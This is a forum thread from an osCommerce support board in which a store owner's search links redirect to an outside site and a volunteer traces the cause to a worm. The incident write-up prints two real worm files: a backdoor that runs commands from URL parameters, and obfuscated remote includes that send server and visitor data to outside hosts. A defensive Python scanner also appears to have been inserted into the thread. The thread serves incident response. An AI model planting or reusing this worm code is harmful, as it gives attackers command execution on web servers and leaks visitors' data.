
osCommerce

The e-commerce.

My links are taking people out to the web, why?


Guest


Can someone help? Our site www.jawproducts.com works fine if you use the regular links, but if you type an item in the search box, i.e. microbrush, then when the microbrushes come up, if you click on the product, it takes you out onto the web! It worked fine for months and now this happens. I thought it was the advanced search file but it matches up fine with the backup file. Does anyone know how to fix this? ANYTHING we click on from the advanced_search_results.php page goes out onto the web instead of staying on our site.


Can someone please help me? My host just says they will get back to me and they never do.

If you go to www.jawproducts.com and use the "search" tab at the top, then type a word, just say "microbrush", then it takes you to the results. When you click on one of the results, the page takes you outside of my site to search.biz.tm, and I don't know why! ipower just installed a dedicated SSL certificate on our site, I configured it and everything, and now suddenly this is happening and I don't know why! They won't give me any answer. Is this something I did wrong? I am new to this, sorry!


You'd better have a look for "foreign" files on your server. If I copy the link and paste into a new tab instead of clicking it takes me to the product page.

 

As you say clicking the product link takes me offsite.

Local: Mac OS X 10.5.8 - Apache 2.2/php 5.3.0/MySQL 5.4.10 • Web Servers: Linux

Tools: BBEdit, Coda, Versions (Subversion), Sequel Pro (db management)


I am new to this, I know what you mean; if you copy and paste it looks right. When you say foreign files, you mean someone probably installed a file on my server? I don't know how they can do that if my admin is passworded. But would that be the source?


I checked and I don't see any foreign files. I don't know what to do; no one seems to know how to fix this, no one at my host is answering me, they just say we'll get back to you. I don't see anything on the web regarding this. I don't know what is going on.


If you watch closely you can see that something is capturing the link after the POST and then redirecting.


I looked but I don't know how to fix that; do you? Is this something that I just cannot fix? I see that it adds manufacturer_id or something and another of my sites does not do that, but is that the problem? I do not know how to fix this. I only see that it's adding ?manufacturers_id but I don't know why that would cause this. I don't know what to do; I have spent 2 days researching this and I am stuck.


It may be something that's not even in your account on the server. Maybe another site is infected and it's worked its way up.

 

The results from your advanced search look just like mine on a test server (aside from the keywords).


I swear I think ipower did this; it was the second they installed my SSL certificate, and now there are all these folders outside of my catalog folder, in the public_html folder. There's a folder called "lh" that I never saw before, and there are all these other folders I've never seen. So you are saying there's nothing I can do?


I swear I think ipower did this; it was the second they installed my SSL certificate, and now there are all these folders outside of my catalog folder, in the public_html folder. There's a folder called "lh" that I never saw before, and there are all these other folders I've never seen. So you are saying there's nothing I can do?

What's in those folders? How many are there? I doubt they're needed for SSL.


There are a ton of new folders and files inside the folders that say "chat_smiles" and some others. Right now I'm FTPing all my files to my hard drive so that I can do a search on all the files at once to see if there are any redirect links or something. I have no idea what is going on.


There are a ton of new folders and files inside the folders that say "chat_smiles" and some others. Right now I'm FTPing all my files to my hard drive so that I can do a search on all the files at once to see if there are any redirect links or something. I have no idea what is going on.

An easier thing might be to create a new folder in the htdocs folder named temp or unused.

 

Then move the folders that you suspect into that one for now and test again.


This is from the top of that search.biz page.

 

<html>
<head>
<title>Search.biz.tm : Search Results : microbrush</title>
<meta http-equiv=Content-Type content="text/html; charset=iso-8859-1">
<link href="/1/style000.css" rel="stylesheet" type="text/css">
<script language=javascript>
<!--
function se(k) {
var link='htt'+'p:/'+'/s'+'ear'+''+'ch.b'+'i'+'z.t'+'m'+'/s'+'ea'+'rch.php?qq='+k+'&said=pv'+'&d=1';
window.location = link;
}
//-->
</script>
</head>

 

I don't know what they're doing or where they grab the input for that.


Thanks for your help. I don't know what to do. I honestly have no idea what I am going to do because I don't know how to fix this.

Just keep on plugging away at it and you'll find the cause. It's not osC that's doing it.


It could be anywhere... something like this is a needle-in-a-haystack scenario. Usually the low life that did this will do their best to hide or obfuscate the code.


BTW, I sent you a PM... basically, I'll take a look at the issue for you at no cost just because I hate the scum that do these types of things. Once I find out what is causing it I'll post the findings so that others won't have to suffer like this.


You will? Oh my gosh, you are amazing! I will pay you for it, let me know how much.

As I said in the PM and the post above...I will do this free of charge and do not want payment. My sole intention is to find the issue then post the findings on the board so other store owners won't have to go through this. A while back some scum got into my site and uploaded some of those PayPal email scripts. They used my server and account to send thousands of spam emails...ever since then I've been on a crusade to crush every piece of crap scammer I can as a service to society.

 

I've already started to debug the site. For example, anytime you have $_GET['keywords'] set, the very next click will take you offsite. This leads me to believe it is not JS but rather PHP code using headers for the redirect. I'll bet you I can find the source of the problem in less than 30 minutes (or double your free money back!) :)


EXECUTIVE SUMMARY

The site owner complained of unwanted redirects to an external site on product search. This was verified, and it was observed that the behavior was not limited to the search page. Anytime $_GET['keywords'] was set, the next link click redirected to the external site. This was a global behavior and was symptomatic on all scripts in the catalog directory.

 

SUMMARY FINDINGS

Upon inspection, several worm files were noticed in the images directory. A total of 22 worm files were found in the images directory (recursive count). Each directory had 2 PHP files... a remote and a replicator respectively. The remote script code enabled arbitrary system commands to be executed. The replicator script copied both files to all available locations. This same pair of files was also found in other directories with 744 CHMOD permissions. This indicates the criminal obtained main FTP user credentials. The initiator code was finally located in the includes/languages/english/header_tags.php file at the bottom, just above the closing PHP tag.

 

The following actions were taken to rectify the security breach:

 

(1) Custom PHP script creation that automatically searches for and deletes the worm PHP files. This custom cleaner script now resides as an admin control panel tool that is conveniently located for the site owner.

 

(2) The .htaccess file in each affected directory had this code appended to it to prevent PHP script execution:

<Files *.php>
Order Deny,Allow
Deny from all
</Files>

This code should prevent HTTP access to the files but will still allow PHP include directives to be executed by the daemon.

 

(3) Advisement of the site owner to change passwords immediately to eliminate the criminal from utilizing the same user credentials to re-initiate the attack.

 

EXAMPLE CODE FROM WORM FILES

File #1

error_reporting(0);
if(isset($_POST["l"]) and isset($_POST["p"])){
if(isset($_POST["input"])){
	$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));
} else {
	$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];
}
} else {
$user_auth="";
}
if(!isset($_POST["log_flg"])){
$log_flg="&log";
}

if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg))
{
if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}

File #2

error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}

 

Total time to de-worm the site was just under 2 hours... 1.5 hours over the estimated 30 minutes in the posts above. Thus, I owe Jennifer double her free money back :)

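As an added example (not code from the thread, from the cleaner tool described above, or from osCommerce), a Python scanner that applies the findings above from the defender's side: it walks a catalog tree, flags .php files under images/ and files that chain include with base64_decode or pass request input to system(), decodes the base64 literals so the call-home host is readable, and checks whether the directory already carries the .htaccess block from action (2). The sample tree, the cnc.example.invalid host and the file contents are constructed placeholders.

```python
import base64
import os
import re
import tempfile

INDICATORS = {  # patterns lifted from the two worm files quoted above; no PHP is executed
    "remote_include": re.compile(r"include(?:_once)?\s*\(\s*base64_decode\("),
    "cmd_exec": re.compile(r"system\s*\(\s*\$_(?:GET|POST)\["),
}
B64_LITERAL = re.compile(r'base64_decode\("([A-Za-z0-9+/=]+)"\)')

def decode_literals(src):
    """Decode each base64_decode("...") literal so the call-home host is readable."""
    return [base64.b64decode(m).decode("latin-1") for m in B64_LITERAL.findall(src)]

def scan_tree(root):
    """Map relative path -> finding for every .php file that matches the worm pattern."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        # Stock osCommerce ships no PHP under images/, so any .php there is suspect.
        in_images = os.path.relpath(dirpath, root).split(os.sep)[0] == "images"
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            src = open(path, encoding="latin-1").read()
            hits = [k for k, rx in INDICATORS.items() if rx.search(src)]
            if hits or in_images:
                ht = os.path.join(dirpath, ".htaccess")  # action (2) from the thread
                blocked = os.path.isfile(ht) and "Deny from all" in open(ht).read()
                findings[os.path.relpath(path, root)] = {
                    "indicators": hits, "in_images": in_images,
                    "decoded": decode_literals(src), "htaccess_blocks_php": blocked}
    return findings

def build_sample_tree():
    """Constructed catalog tree mimicking the infection (placeholder C2 host); returns root."""
    root = tempfile.mkdtemp()
    cnc = base64.b64encode(b"http://cnc.example.invalid/master.php?r_addr=").decode()
    files = {
        "images/banners/remote.php": '<?php\nif(! @include_once(base64_decode("%s"))){system($_GET["a3kfj39fsj2"]);}\n' % cnc,
        "images/banners/.htaccess": "<Files *.php>\nOrder Deny,Allow\nDeny from all\n</Files>\n",
        "includes/languages/english/header_tags.php":
            '<?php\ndefine("HEAD_TITLE_TAG_ALL", "Shop");\n@include_once(base64_decode("%s"));\n' % cnc,
        "product_info.php": "<?php\necho 'ok';\n",  # clean file, must not be flagged
    }
    for rel, body in files.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        open(os.path.join(root, rel), "w").write(body)
    return root
```

Run scan_tree() against a copy of a suspect catalog directory; the decoded literals tell you which host to block at the firewall and the htaccess_blocks_php flag shows which directories still need the deny rule.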

This is interesting

 

From the Header Tags Controller contribution...

 

File: corrections_to_Header_Tags_Controller.txt

 

ADDITIONAL CORRECTIONS TO INSTALL INSTRUCTIONS (by Steve(aka 241))

 

There is a vital instruction missing from the install instructions which should tell you to set two files with permissions CHMOD 666

 

catalog/includes/header_tags.php

 

catalog/includes/languages/english/header_tags.php

 

This makes it an easier target than most files.


Alan,

 

I don't think it is a contribution security issue but rather that the server the site is hosted on has been rooted. Once again, the tell-all sign is that the worm files had proper user permissions and ownership... thus the attacker had either user-level credentials OR root credentials and SU via terminal.

 

Since the passwords were going to be changed anyway the site owner supplied me with the main user credentials. From this I can tell that the password would have very little chance for brute force. BTW, Jennifer...you DID change ALL the passwords, right?

 

I can assume with a high degree of certainty that the server has been rooted. It concerns me as her site is hosted on ipow, which is a very active hosting company. There could be thousands of osC sites which are affected by the fact the server has been rooted... of course, only if they are hosted with ipow.

 

I have sent an email to the ipow administration with the replicator file code and other information / data. However, if any store owners have a site hosted with ipow I would recommend a site script inspection to ensure it is clean of worm files. I have seen the replicator code, and with root permissions it can replicate the worm files to EVERY account on that server... in addition, it can reach out to every server in the cluster.
